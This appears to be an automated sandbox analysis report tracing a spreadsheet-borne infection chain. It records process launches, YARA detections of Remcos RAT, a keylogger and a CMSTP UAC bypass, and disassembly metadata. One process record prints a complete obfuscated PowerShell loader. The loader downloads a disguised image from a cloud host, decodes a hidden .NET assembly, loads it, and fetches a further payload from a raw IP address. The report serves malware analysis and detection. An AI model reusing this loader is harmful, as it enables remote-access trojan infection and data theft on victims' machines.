                                                                                                                                                                                  Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\weneedkissingwellongirlfriendshebeautif.vbS"
                                                                                                                                                                                  Imagebase:0xffec0000
                                                                                                                                                                                  File size:168'960 bytes
                                                                                                                                                                                  MD5 hash:045451FA238A75305CC26AC982472367
                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                  General

                                                                                                                                                                                  Target ID:23
                                                                                                                                                                                  Start time:08:01:30
                                                                                                                                                                                  Start date:03/12/2024
                                                                                                                                                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                  Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $biscato = 'JHNvcnJlbmFyID0gJ2h0dHBzOi8vcmVzLmNsb3VkaW5hcnkuY29tL2R5dGZsdDYxbi9pbWFnZS91cGxvYWQvdjE3MzMxMzQ5NDcvYmtscHlzZXlldXQ0aW1wdzUwbjEuanBnICc7JGRlc2VyZGFyID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDskZGVzYXZlc3NvID0gJGRlc2VyZGFyLkRvd25sb2FkRGF0YSgkc29ycmVuYXIpOyR0b21iZWlybyA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKCRkZXNhdmVzc28pOyRjcmV0aW5pemFyID0gJzw8QkFTRTY0X1NUQVJUPj4nOyRnbGFuZHVsaWZvcm1lID0gJzw8QkFTRTY0X0VORD4+JzskZ3Jvc2EgPSAkdG9tYmVpcm8uSW5kZXhPZigkY3JldGluaXphcik7JHRyaWdsb3R0aXNtbyA9ICR0b21iZWlyby5JbmRleE9mKCRnbGFuZHVsaWZvcm1lKTskZ3Jvc2EgLWdlIDAgLWFuZCAkdHJpZ2xvdHRpc21vIC1ndCAkZ3Jvc2E7JGdyb3NhICs9ICRjcmV0aW5pemFyLkxlbmd0aDskZGVzYWJhZmFyID0gJHRyaWdsb3R0aXNtbyAtICRncm9zYTskc29mZnJpdmVsbWVudGUgPSAkdG9tYmVpcm8uU3Vic3RyaW5nKCRncm9zYSwgJGRlc2FiYWZhcik7JGNvbnRyYWNhbWJpYXIgPSAtam9pbiAoJHNvZmZyaXZlbG1lbnRlLlRvQ2hhckFycmF5KCkgfCBGb3JFYWNoLU9iamVjdCB7ICRfIH0pWy0xLi4tKCRzb2Zmcml2ZWxtZW50ZS5MZW5ndGgpXTskY2F0YXJhY3RhID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygkY29udHJhY2FtYmlhcik7JGJhbWJ1bGEgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKCRjYXRhcmFjdGEpOyR0cmluY29sZWpvID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZCgnVkFJJyk7JHRyaW5jb2xlam8uSW52b2tlKCRudWxsLCBAKCd0eHQuUkVSVlJTLzA4Ni8xNjEuNTYuMzkuMjQxLy86cHR0aCcsICckYW5pbWFyJywgJyRhbmltYXInLCAnJGFuaW1hcicsICdDYXNQb2wnLCAnJGFuaW1hcicsICckYW5pbWFyJywnJGFuaW1hcicsJyRhbmltYXInLCckYW5pbWFyJywnJGFuaW1hcicsJyRhbmltYXInLCcxJywnJGFuaW1hcicpKTs=';$desalinhadamente = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($biscato));Invoke-Expression $desalinhadamente
                                                                                                                                                                                  Imagebase:0x13f3f0000
                                                                                                                                                                                  File size:443'392 bytes
                                                                                                                                                                                  MD5 hash:A575A7610E5F003CC36DF39E07C4BA7D
                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                  General

                                                                                                                                                                                  Target ID:25
                                                                                                                                                                                  Start time:08:01:40
                                                                                                                                                                                  Start date:03/12/2024
                                                                                                                                                                                  Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                  Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"
                                                                                                                                                                                  Imagebase:0xc40000
                                                                                                                                                                                  File size:107'704 bytes
                                                                                                                                                                                  MD5 hash:8AD6D0D81FEC2856B8DCABEE8D678F61
                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                  General

                                                                                                                                                                                  Target ID:29
                                                                                                                                                                                  Start time:08:01:47
                                                                                                                                                                                  Start date:03/12/2024
                                                                                                                                                                                  Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                  Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\user\AppData\Local\Temp\tozq"
                                                                                                                                                                                  Imagebase:0xc40000
                                                                                                                                                                                  File size:107'704 bytes
                                                                                                                                                                                  MD5 hash:8AD6D0D81FEC2856B8DCABEE8D678F61
                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                  General

                                                                                                                                                                                  Target ID:30
                                                                                                                                                                                  Start time:08:01:47
                                                                                                                                                                                  Start date:03/12/2024
                                                                                                                                                                                  Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                  Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\user\AppData\Local\Temp\wieivps"
                                                                                                                                                                                  Imagebase:0xc40000
                                                                                                                                                                                  File size:107'704 bytes
                                                                                                                                                                                  MD5 hash:8AD6D0D81FEC2856B8DCABEE8D678F61
                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                  General

                                                                                                                                                                                  Target ID:31
                                                                                                                                                                                  Start time:08:01:48
                                                                                                                                                                                  Start date:03/12/2024
                                                                                                                                                                                  Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                  Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\user\AppData\Local\Temp\gcjtvhddyq"
                                                                                                                                                                                  Imagebase:0xc40000
                                                                                                                                                                                  File size:107'704 bytes
                                                                                                                                                                                  MD5 hash:8AD6D0D81FEC2856B8DCABEE8D678F61
                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                  General

                                                                                                                                                                                  Target ID:32
                                                                                                                                                                                  Start time:08:01:54
                                                                                                                                                                                  Start date:03/12/2024
                                                                                                                                                                                  Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                  Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"
                                                                                                                                                                                  Imagebase:0xc40000
                                                                                                                                                                                  File size:107'704 bytes
                                                                                                                                                                                  MD5 hash:8AD6D0D81FEC2856B8DCABEE8D678F61
                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                  Yara matches:
                                                                                                                                                                                  • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000020.00000002.555858192.0000000000585000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                  • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000020.00000002.555239119.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                  • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000020.00000002.555239119.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                  • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000020.00000002.555239119.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                  • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000020.00000002.555239119.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                  • Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000020.00000002.555239119.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                  • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 00000020.00000002.555239119.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                  Disassembly

                                                                                                                                                                                  Code Analysis

                                                                                                                                                                                  Call Graph

                                                                                                                                                                                  • Entrypoint
                                                                                                                                                                                  • Decryption Function
                                                                                                                                                                                  • Executed
                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                  • Show Help
                                                                                                                                                                                  callgraph 1 Error: Graph is empty

                                                                                                                                                                                  Module: Sheet1

                                                                                                                                                                                  Declaration
                                                                                                                                                                                  LineContent
                                                                                                                                                                                  1

                                                                                                                                                                                  Attribute VB_Name = "Sheet1"

                                                                                                                                                                                  2

                                                                                                                                                                                  Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"

                                                                                                                                                                                  3

                                                                                                                                                                                  Attribute VB_GlobalNameSpace = False

                                                                                                                                                                                  4

                                                                                                                                                                                  Attribute VB_Creatable = False

                                                                                                                                                                                  5

                                                                                                                                                                                  Attribute VB_PredeclaredId = True

                                                                                                                                                                                  6

                                                                                                                                                                                  Attribute VB_Exposed = True

                                                                                                                                                                                  7

                                                                                                                                                                                  Attribute VB_TemplateDerived = False

                                                                                                                                                                                  8

                                                                                                                                                                                  Attribute VB_Customizable = True

                                                                                                                                                                                  9

                                                                                                                                                                                  Attribute VB_Name = "Sheet1"

                                                                                                                                                                                  10

                                                                                                                                                                                  Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"

                                                                                                                                                                                  11

                                                                                                                                                                                  Attribute VB_GlobalNameSpace = False

                                                                                                                                                                                  12

                                                                                                                                                                                  Attribute VB_Creatable = False

                                                                                                                                                                                  13

                                                                                                                                                                                  Attribute VB_PredeclaredId = True

                                                                                                                                                                                  14

                                                                                                                                                                                  Attribute VB_Exposed = True

                                                                                                                                                                                  15

                                                                                                                                                                                  Attribute VB_TemplateDerived = False

                                                                                                                                                                                  16

                                                                                                                                                                                  Attribute VB_Customizable = True

                                                                                                                                                                                  Module: Sheet2

                                                                                                                                                                                  Declaration
                                                                                                                                                                                  LineContent
                                                                                                                                                                                  1

                                                                                                                                                                                  Attribute VB_Name = "Sheet2"

                                                                                                                                                                                  2

                                                                                                                                                                                  Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"

                                                                                                                                                                                  3

                                                                                                                                                                                  Attribute VB_GlobalNameSpace = False

                                                                                                                                                                                  4

                                                                                                                                                                                  Attribute VB_Creatable = False

                                                                                                                                                                                  5

                                                                                                                                                                                  Attribute VB_PredeclaredId = True

                                                                                                                                                                                  6

                                                                                                                                                                                  Attribute VB_Exposed = True

                                                                                                                                                                                  7

                                                                                                                                                                                  Attribute VB_TemplateDerived = False

                                                                                                                                                                                  8

                                                                                                                                                                                  Attribute VB_Customizable = True

                                                                                                                                                                                  9

                                                                                                                                                                                  Attribute VB_Name = "Sheet2"

                                                                                                                                                                                  10

                                                                                                                                                                                  Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"

                                                                                                                                                                                  11

                                                                                                                                                                                  Attribute VB_GlobalNameSpace = False

                                                                                                                                                                                  12

                                                                                                                                                                                  Attribute VB_Creatable = False

                                                                                                                                                                                  13

                                                                                                                                                                                  Attribute VB_PredeclaredId = True

                                                                                                                                                                                  14

                                                                                                                                                                                  Attribute VB_Exposed = True

                                                                                                                                                                                  15

                                                                                                                                                                                  Attribute VB_TemplateDerived = False

                                                                                                                                                                                  16

                                                                                                                                                                                  Attribute VB_Customizable = True

                                                                                                                                                                                  Module: ThisWorkbook

                                                                                                                                                                                  Declaration
                                                                                                                                                                                  LineContent
                                                                                                                                                                                  1

                                                                                                                                                                                  Attribute VB_Name = "ThisWorkbook"

                                                                                                                                                                                  2

                                                                                                                                                                                  Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"

                                                                                                                                                                                  3

                                                                                                                                                                                  Attribute VB_GlobalNameSpace = False

                                                                                                                                                                                  4

                                                                                                                                                                                  Attribute VB_Creatable = False

                                                                                                                                                                                  5

                                                                                                                                                                                  Attribute VB_PredeclaredId = True

                                                                                                                                                                                  6

                                                                                                                                                                                  Attribute VB_Exposed = True

                                                                                                                                                                                  7

                                                                                                                                                                                  Attribute VB_TemplateDerived = False

                                                                                                                                                                                  8

                                                                                                                                                                                  Attribute VB_Customizable = True

                                                                                                                                                                                  9

                                                                                                                                                                                  Attribute VB_Name = "ThisWorkbook"

                                                                                                                                                                                  10

                                                                                                                                                                                  Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"

                                                                                                                                                                                  11

                                                                                                                                                                                  Attribute VB_GlobalNameSpace = False

                                                                                                                                                                                  12

                                                                                                                                                                                  Attribute VB_Creatable = False

                                                                                                                                                                                  13

                                                                                                                                                                                  Attribute VB_PredeclaredId = True

                                                                                                                                                                                  14

                                                                                                                                                                                  Attribute VB_Exposed = True

                                                                                                                                                                                  15

                                                                                                                                                                                  Attribute VB_TemplateDerived = False

                                                                                                                                                                                  16

                                                                                                                                                                                  Attribute VB_Customizable = True

                                                                                                                                                                                  Reset < >

                                                                                                                                                                                    Executed Functions

                                                                                                                                                                                    Function 03130FB1 Relevance: .0, Instructions: 5COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000004.00000003.442738173.0000000003130000.00000010.00000800.00020000.00000000.sdmp, Offset: 03130000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_4_3_3130000_mshta.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                    • Opcode ID: 5b6f7839063d9ef41bdfbe4116d10e7f1b6142974b10c5c3148811bafbd638da
                                                                                                                                                                                    • Instruction ID: 70abbb2690a8420366a7860d47bc8a8fbdcc370cbd3d813c82b20e7fe383b468
                                                                                                                                                                                    • Opcode Fuzzy Hash: 5b6f7839063d9ef41bdfbe4116d10e7f1b6142974b10c5c3148811bafbd638da
                                                                                                                                                                                    • Instruction Fuzzy Hash:
                                                                                                                                                                                    Function 03130FB9 Relevance: .0, Instructions: 5COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000004.00000003.442738173.0000000003130000.00000010.00000800.00020000.00000000.sdmp, Offset: 03130000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_4_3_3130000_mshta.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                    • Opcode ID: 5b6f7839063d9ef41bdfbe4116d10e7f1b6142974b10c5c3148811bafbd638da
                                                                                                                                                                                    • Instruction ID: 70abbb2690a8420366a7860d47bc8a8fbdcc370cbd3d813c82b20e7fe383b468
                                                                                                                                                                                    • Opcode Fuzzy Hash: 5b6f7839063d9ef41bdfbe4116d10e7f1b6142974b10c5c3148811bafbd638da
                                                                                                                                                                                    • Instruction Fuzzy Hash:
                                                                                                                                                                                    Function 03130FC1 Relevance: .0, Instructions: 5COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000004.00000003.442738173.0000000003130000.00000010.00000800.00020000.00000000.sdmp, Offset: 03130000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_4_3_3130000_mshta.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                    • Opcode ID: 5b6f7839063d9ef41bdfbe4116d10e7f1b6142974b10c5c3148811bafbd638da
                                                                                                                                                                                    • Instruction ID: 70abbb2690a8420366a7860d47bc8a8fbdcc370cbd3d813c82b20e7fe383b468
                                                                                                                                                                                    • Opcode Fuzzy Hash: 5b6f7839063d9ef41bdfbe4116d10e7f1b6142974b10c5c3148811bafbd638da
                                                                                                                                                                                    • Instruction Fuzzy Hash:

                                                                                                                                                                                    Execution Graph

                                                                                                                                                                                    Execution Coverage:3.7%
                                                                                                                                                                                    Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                    Signature Coverage:0%
                                                                                                                                                                                    Total number of Nodes:4
                                                                                                                                                                                    Total number of Limit Nodes:0
                                                                                                                                                                                    execution_graph 3817 7fe899c7c25 3819 7fe899c7c33 3817->3819 3818 7fe899c7c00 3819->3818 3820 7fe899c7be3 URLDownloadToFileW 3819->3820 3820->3818

                                                                                                                                                                                    Executed Functions

                                                                                                                                                                                    Function 000007FE899C7018 Relevance: 1.6, APIs: 1, Instructions: 129filenetworkCOMMON
                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                    APIs
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000007.00000002.475177430.000007FE899C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE899C0000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_7fe899c0000_powershell.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: DownloadFile
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 1407266417-0
                                                                                                                                                                                    • Opcode ID: 9948bc6d770e860b75fa454e1b26024c9bb87e678cf14dd0d4350483a9068b22
                                                                                                                                                                                    • Instruction ID: dd9d2aec8907b5c0eb7b7e7fbd4249ce01c59a8a7d2b2634bc6a0a032837168b
                                                                                                                                                                                    • Opcode Fuzzy Hash: 9948bc6d770e860b75fa454e1b26024c9bb87e678cf14dd0d4350483a9068b22
                                                                                                                                                                                    • Instruction Fuzzy Hash: 14319F31918A5C9FDB58EF5CD885BA9B7E1FB59725F00822ED04DD3661CB70B8068B81
                                                                                                                                                                                    Function 000007FE899C7AE1 Relevance: 1.7, APIs: 1, Instructions: 159filenetworkCOMMON
                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                    APIs
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000007.00000002.475177430.000007FE899C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE899C0000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_7fe899c0000_powershell.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: DownloadFile
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 1407266417-0
                                                                                                                                                                                    • Opcode ID: 3564d2ac142c4a064d696a39380aff265b310662ce154e6a372ec1fea6ce31e1
                                                                                                                                                                                    • Instruction ID: 641bd9236fe160d63ae29a915ee22288c1fc05c9ce19101104c63db51e3d72cf
                                                                                                                                                                                    • Opcode Fuzzy Hash: 3564d2ac142c4a064d696a39380aff265b310662ce154e6a372ec1fea6ce31e1
                                                                                                                                                                                    • Instruction Fuzzy Hash: 6041E67181CB889FD719DB589C447AABBF4FB56325F04426FD08DD35A2CB646806C781
                                                                                                                                                                                    Function 000007FE899C7C25 Relevance: 1.6, APIs: 1, Instructions: 60COMMON
                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000007.00000002.475177430.000007FE899C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE899C0000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_7fe899c0000_powershell.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                    • Opcode ID: 5ae42f63c2c43ec436d9fab267423d4fba3339404ee99d48afa5b0ecd76930c9
                                                                                                                                                                                    • Instruction ID: c5b60c5345318ebf1949d6af1576c78d9518ea2194306bca779a10ce0cb9eaec
                                                                                                                                                                                    • Opcode Fuzzy Hash: 5ae42f63c2c43ec436d9fab267423d4fba3339404ee99d48afa5b0ecd76930c9
                                                                                                                                                                                    • Instruction Fuzzy Hash: 7A11633190D3C14FD30B9B68AC516987FB0EF43269F0941EBC099C75E3C619645AC766
                                                                                                                                                                                    Function 000007FE89A98519 Relevance: .7, Instructions: 712COMMON
                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                    • Executed
                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                    control_flow_graph 37 7fe89a98519-7fe89a98539 38 7fe89a98556-7fe89a9855a 37->38 39 7fe89a9853c-7fe89a98554 37->39 40 7fe89a98576-7fe89a985c9 38->40 41 7fe89a9855c-7fe89a98572 38->41 39->38 43 7fe89a98aad-7fe89a98b66 40->43 44 7fe89a985cf-7fe89a985d9 40->44 41->40 45 7fe89a985db-7fe89a985e8 44->45 46 7fe89a985f2-7fe89a985f9 44->46 45->46 48 7fe89a985ea-7fe89a985f0 45->48 49 7fe89a985fb-7fe89a9860e 46->49 50 7fe89a98610 46->50 48->46 51 7fe89a98612-7fe89a98614 49->51 50->51 54 7fe89a98a28-7fe89a98a32 51->54 55 7fe89a9861a-7fe89a98626 51->55 56 7fe89a98a34-7fe89a98a44 54->56 57 7fe89a98a45-7fe89a98a55 54->57 55->43 58 7fe89a9862c-7fe89a98636 55->58 60 7fe89a98a57-7fe89a98a5b 57->60 61 7fe89a98a62-7fe89a98aac 57->61 62 7fe89a98638-7fe89a98645 58->62 63 7fe89a98652-7fe89a98662 58->63 60->61 62->63 64 7fe89a98647-7fe89a98650 62->64 63->54 69 7fe89a98668-7fe89a9869c 63->69 64->63 69->54 74 7fe89a986a2-7fe89a986ae 69->74 74->43 75 7fe89a986b4-7fe89a986be 74->75 76 7fe89a986d7-7fe89a986dc 75->76 77 7fe89a986c0-7fe89a986cd 75->77 76->54 78 7fe89a986e2-7fe89a986e7 76->78 77->76 79 7fe89a986cf-7fe89a986d5 77->79 78->54 80 7fe89a986ed-7fe89a986f2 78->80 79->76 80->54 81 7fe89a986f8-7fe89a98707 80->81 83 7fe89a98709-7fe89a98713 81->83 84 7fe89a98717 81->84 85 7fe89a98715 83->85 86 7fe89a98733-7fe89a987be 83->86 87 7fe89a9871c-7fe89a98729 84->87 85->87 94 7fe89a987c0-7fe89a987cb 86->94 95 7fe89a987d2-7fe89a987f4 86->95 87->86 88 7fe89a9872b-7fe89a98731 87->88 88->86 94->95 96 7fe89a987f6-7fe89a98800 95->96 97 7fe89a98804 95->97 98 7fe89a98820-7fe89a988ae 96->98 99 7fe89a98802 96->99 100 7fe89a98809-7fe89a98816 97->100 107 7fe89a988b0-7fe89a988bb 98->107 108 7fe89a988c2-7fe89a988e0 98->108 99->100 100->98 102 7fe89a98818-7fe89a9881e 100->102 102->98 107->108 109 7fe89a988f0 108->109 110 7fe89a988e2-7fe89a988ec 108->110 113 7fe89a988f5-7fe89a98903 109->113 111 7fe89a9890d-7fe89a9899d 110->111 112 7fe89a988ee 110->112 120 7fe89a989b1-7fe89a98a0a 111->120 121 7fe89a9899f-7fe89a989aa 111->121 112->113 113->111 114 7fe89a98905-7fe89a9890b 113->114 114->111 124 7fe89a98a12-7fe89a98a27 120->124 121->120
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000007.00000002.475254905.000007FE89A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE89A90000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_7fe89a90000_powershell.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                    • Opcode ID: d2403c251dbc73ef8ddc6e03f6a505157edf141af2d7fac28bd20ed318353ec3
                                                                                                                                                                                    • Instruction ID: 5f4c880db7279d3cb9cad35b699c4f18f251b1adc8e83878d079f5170d56eceb
                                                                                                                                                                                    • Opcode Fuzzy Hash: d2403c251dbc73ef8ddc6e03f6a505157edf141af2d7fac28bd20ed318353ec3
                                                                                                                                                                                    • Instruction Fuzzy Hash: E922F43090CB894FE799DB2C84506797BE2FF9A344F2441EED48EC72A3DA25AC15C741
                                                                                                                                                                                    Function 000007FE89A94135 Relevance: .4, Instructions: 426COMMON
                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                    • Executed
                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                    control_flow_graph 125 7fe89a94135-7fe89a941c4 126 7fe89a94427-7fe89a944e6 125->126 127 7fe89a941ca-7fe89a941d4 125->127 128 7fe89a941d6-7fe89a941e3 127->128 129 7fe89a941ed-7fe89a941f2 127->129 128->129 132 7fe89a941e5-7fe89a941eb 128->132 130 7fe89a941f8-7fe89a941fb 129->130 131 7fe89a943cb-7fe89a943d5 129->131 134 7fe89a941fd-7fe89a94210 130->134 135 7fe89a94212 130->135 136 7fe89a943d7-7fe89a943e3 131->136 137 7fe89a943e4-7fe89a943f4 131->137 132->129 138 7fe89a94214-7fe89a94216 134->138 135->138 139 7fe89a943f6-7fe89a943fa 137->139 140 7fe89a94401-7fe89a94424 137->140 138->131 143 7fe89a9421c-7fe89a94250 138->143 139->140 140->126 150 7fe89a94267 143->150 151 7fe89a94252-7fe89a94265 143->151 152 7fe89a94269-7fe89a9426b 150->152 151->152 152->131 154 7fe89a94271-7fe89a94279 152->154 154->126 155 7fe89a9427f-7fe89a94289 154->155 156 7fe89a9428b-7fe89a94298 155->156 157 7fe89a942a5-7fe89a942b5 155->157 156->157 158 7fe89a9429a-7fe89a942a3 156->158 157->131 161 7fe89a942bb-7fe89a942ec 157->161 158->157 161->131 164 7fe89a942f2-7fe89a9431e 161->164 166 7fe89a94320-7fe89a94342 164->166 167 7fe89a94344 164->167 168 7fe89a94346-7fe89a94348 166->168 167->168 168->131 169 7fe89a9434e-7fe89a94356 168->169 171 7fe89a94358-7fe89a94362 169->171 172 7fe89a94366 169->172 174 7fe89a94364 171->174 175 7fe89a94382-7fe89a943b1 171->175 176 7fe89a9436b-7fe89a94378 172->176 174->176 179 7fe89a943b8-7fe89a943ca 175->179 176->175 177 7fe89a9437a-7fe89a94380 176->177 177->175
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000007.00000002.475254905.000007FE89A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE89A90000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_7fe89a90000_powershell.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                    • Opcode ID: 43be583adbb37e530749bc0bb4a1e08e9d1858f8ca943ac8ba1382489673ff5c
                                                                                                                                                                                    • Instruction ID: 5b32601b0123bee8572b58b9d22997df1f1810b8f1ee83055a32f8d0571bec24
                                                                                                                                                                                    • Opcode Fuzzy Hash: 43be583adbb37e530749bc0bb4a1e08e9d1858f8ca943ac8ba1382489673ff5c
                                                                                                                                                                                    • Instruction Fuzzy Hash: E4C1553091DB9A0FE74AA77C58506BA7FE1FF4A784F1801EAD48EC71A3D618AC15C361
                                                                                                                                                                                    Function 000007FE89A9563D Relevance: .4, Instructions: 410COMMON
                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                    • Executed
                                                                                                                                                                                    • Not Executed
